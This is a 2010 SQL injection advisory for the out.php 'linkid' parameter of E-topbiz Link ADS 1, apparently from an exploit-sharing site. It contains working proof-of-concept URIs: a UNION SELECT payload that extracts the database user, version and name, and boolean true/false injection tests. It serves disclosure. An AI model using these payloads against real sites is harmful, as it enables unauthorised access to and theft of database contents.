E-topbiz Link ADS 1 (out.php) SQL Injection Vulnerability
Posted on 07 March 2010
========================================================= E-topbiz Link ADS 1 (out.php) SQL Injection Vulnerability ========================================================= Product: http://e-topbiz.com/oprema/pages/linkads1.php Descussion: Link ADS 1 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- http://www.example.com/out.php?linkid=50+and+1=1 (true) http://www.example.com/out.php?linkid=50+and+1=2 (false) # ~ - [ [ : Inj3ct0r : ] ]